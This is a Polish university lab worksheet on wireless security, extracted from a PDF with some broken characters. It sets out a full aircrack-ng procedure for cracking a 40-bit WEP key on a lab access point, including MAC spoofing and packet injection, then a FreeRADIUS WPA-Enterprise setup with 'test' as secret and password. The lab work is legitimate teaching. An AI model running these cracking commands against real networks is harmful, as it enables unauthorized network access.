background image

 
 

Laboratorium nr. 3 

 

 
PrzedmiotSieci bezprzewodowe 
Czas trwania: 3h 
 

Temat :

 

Zabezpieczanie transmisji oraz dost

ę

pu w sieciach bezprzewodowych

 

 
1)

 

Łamanie zabezpieczeń protokołu WEP 

 

Przygotować środowisko według poniŜszego schematu.

 

 

SSID=”Lab1-
<nr_podgrupy>”

Access Point

z  WEP

PC1

BackTrack 3

 

 
Ustawić następujące parametry na Aceess Poincie: 
 
 

a) uwierzytelnianie – WEP  

 

b) numer kanału – ((<nr_podgrupy>-1)*5+1) mod 12  

 

c) 40 bitowy klucz  

 

Podłączyć  Pc1  z  Access  Pointem  i  generować  duŜo  ruchu  sieciowego.  Na  BackTrack  3 
wykonać próbę odzyskania klucza sieciowego  wykorzystując narzędzia zawarte w  systemie 
Backtrack 3 uruchamianego z nośnika USB. 

Procedura łamania hasła protokołu WEP 

1) NaleŜy przestawić kartę bezprzewodową w tryb monitor 

modprobe -r iwl3945

                                                                                                    

modprobe ipwraw

 

iwconfig // sprawdzenie nazwy interfejsu bezprzewodowego

 

airmon-ng stop [device]

 

i

fconfig [interface] down

 

 

background image

 

 

2) Zmiana adresu MAC karty sieciowej i wystartowanie karty w trybie monitor. 

macchanger --mac 00:11:22:33:44:66 [device]

 

airmon-ng start [device] 

3) Przechwytywanie pakietów wybranej sieci 

airodump-ng [device] //podsłuch wszystkich sieci w zasi

ę

gu

 

airodump-ng -c [channel] -w [network.out] –-bssid [bssid] [device]  

 
4) Sztuczne generowanie duŜej ilości ruchu sieciowego w celu przyspieszenia procesu 
łamania hasła (uruchomione w odrębnych shellach) 

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

 

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]             
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 
[device] 

5)  Próba łamania hasła  

 

aircrack-ng -n 64 -b [bssid] [filename]-01.cap 

 

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

background image

 
 
 
 

 
2)

 

Uwierzytelnianie klientów za pomocą serwera RADIUS 

 

Skonfigurować połączenia sieciowe według poniŜszego schematu

 
 

 

 

Ustawić następujące parametry : 
 
 

a) uwierzytelnianie – WPA-Enterprise w oparciu o serwe r uwierzytelniający RADIUS 

 

b) numer kanału – ((<nr_podgrupy>-1)*5+1) mod 12 

 
Na  serwerze  RADIUS  stworzyć  konta  uŜytkowników.  Dokonać  próby  uwierzytelnienia 
klienta z PC1 i PC2  
 
Zadania wykonać dla Access Pointa Linksys i Cisco. 
 
Jako sewer RADIUS uŜyć

 

oprogramowania FreeRADIUS na systemie Linux 

 
Etapy konfigurowania FreeRADIUSa 
Dodanie wpisu do pliku  /usr/local/etc/raddb/cliens.conf: 
 
client <adres_ip>/<maska_podsieci> { 
secret = test 

Dodanie uŜytkownika test do bazy do pliku /usr/local/etc/raddb/users: 
 

test Cleartext-Password := "test" 

 
Uruchomienia demona w trybie debug: 

radiusd -X -f